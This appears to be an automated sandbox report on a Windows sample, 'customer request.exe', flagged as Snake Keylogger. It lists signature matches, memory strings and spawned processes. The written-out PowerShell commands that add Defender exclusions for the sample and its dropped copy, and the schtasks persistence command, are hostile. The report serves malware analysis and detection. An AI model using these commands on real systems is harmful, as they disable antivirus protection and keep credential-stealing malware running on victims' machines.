Source: 0.2.customer request.exe.4d3e188.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.customer request.exe.4d3e188.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.customer request.exe.4d1d568.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.customer request.exe.4d1d568.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.customer request.exe.4d1d568.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.customer request.exe.4d1d568.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000008.00000002.4133954704.000000000040D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000008.00000002.4133954704.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000A.00000002.1763910283.0000000004B99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.1763910283.0000000004B99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.1722509797.0000000004D1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1722509797.0000000004D1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000A.00000002.1763910283.0000000004C7B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.1763910283.0000000004C7B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: customer request.exe PID: 6848, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: customer request.exe PID: 6848, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: customer request.exe PID: 1908, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: customer request.exe PID: 1908, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: tjvxuavKFXO.exe PID: 7348, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: tjvxuavKFXO.exe PID: 7348, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: customer request.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: tjvxuavKFXO.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.customer request.exe.4d3e188.4.raw.unpack, R.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.customer request.exe.4d3e188.4.raw.unpack, R.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.customer request.exe.4d3e188.4.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.customer request.exe.4d3e188.4.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.customer request.exe.4d1d568.5.raw.unpack, R.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.customer request.exe.4d1d568.5.raw.unpack, R.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.customer request.exe.4d1d568.5.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.customer request.exe.4d1d568.5.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, R.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, R.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.customer request.exe.4d3e188.4.raw.unpack, R.cs	Base64 encoded string: 'IYvRMmOKhHchXcVKPaPKsKtXGubVCdkX4vgNgD8HAOj1Z/62t6lZAA==', 'snM7fLvHNbdjCJu35N+B6cRz3hn7mKKZ0vd79V841fonKp3fsJC2NIkc71T98XY5'
Source: 0.2.customer request.exe.4d1d568.5.raw.unpack, R.cs	Base64 encoded string: 'IYvRMmOKhHchXcVKPaPKsKtXGubVCdkX4vgNgD8HAOj1Z/62t6lZAA==', 'snM7fLvHNbdjCJu35N+B6cRz3hn7mKKZ0vd79V841fonKp3fsJC2NIkc71T98XY5'
Source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, R.cs	Base64 encoded string: 'IYvRMmOKhHchXcVKPaPKsKtXGubVCdkX4vgNgD8HAOj1Z/62t6lZAA==', 'snM7fLvHNbdjCJu35N+B6cRz3hn7mKKZ0vd79V841fonKp3fsJC2NIkc71T98XY5'
Source: 10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpack, R.cs	Base64 encoded string: 'IYvRMmOKhHchXcVKPaPKsKtXGubVCdkX4vgNgD8HAOj1Z/62t6lZAA==', 'snM7fLvHNbdjCJu35N+B6cRz3hn7mKKZ0vd79V841fonKp3fsJC2NIkc71T98XY5'

Source: 0.2.customer request.exe.4c15560.2.raw.unpack, exaQCHJYgINh8UmdbN.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.customer request.exe.4c15560.2.raw.unpack, exaQCHJYgINh8UmdbN.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.customer request.exe.4c15560.2.raw.unpack, s7tEnZsGU0CiWE4q63.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.customer request.exe.4c15560.2.raw.unpack, s7tEnZsGU0CiWE4q63.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.customer request.exe.4c15560.2.raw.unpack, s7tEnZsGU0CiWE4q63.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, exaQCHJYgINh8UmdbN.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, exaQCHJYgINh8UmdbN.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, s7tEnZsGU0CiWE4q63.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, s7tEnZsGU0CiWE4q63.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, s7tEnZsGU0CiWE4q63.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, exaQCHJYgINh8UmdbN.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, exaQCHJYgINh8UmdbN.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, s7tEnZsGU0CiWE4q63.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, s7tEnZsGU0CiWE4q63.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, s7tEnZsGU0CiWE4q63.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/15@3/3

Source: C:\Users\user\Desktop\customer request.exe

File created: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6020:120:WilError_03
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Mutant created: \Sessions\1\BaseNamedObjects\jLpANYN
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2008:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7444:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1732:120:WilError_03

Source: C:\Users\user\Desktop\customer request.exe

File created: C:\Users\user\AppData\Local\Temp\tmp6BAE.tmp

Jump to behavior

Source: customer request.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: customer request.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\customer request.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\customer request.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: customer request.exe, 00000008.00000002.4137608364.0000000002E1A000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002E29000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: customer request.exe	ReversingLabs: Detection: 29%
Source: customer request.exe	Virustotal: Detection: 35%

Source: C:\Users\user\Desktop\customer request.exe

File read: C:\Users\user\Desktop\customer request.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\customer request.exe "C:\Users\user\Desktop\customer request.exe"
Source: C:\Users\user\Desktop\customer request.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\customer request.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\customer request.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\customer request.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp6BAE.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\customer request.exe	Process created: C:\Users\user\Desktop\customer request.exe "C:\Users\user\Desktop\customer request.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp7D04.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process created: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe "C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe"
Source: C:\Users\user\Desktop\customer request.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\customer request.exe"	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe"	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp6BAE.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Process created: C:\Users\user\Desktop\customer request.exe "C:\Users\user\Desktop\customer request.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tjvxuavKFXO" /XML "C:\Users\user\AppData\Local\Temp\tmp7D04.tmp"
Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe	Process created: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe "C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe"

Source: C:\Users\user\Desktop\customer request.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\customer request.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
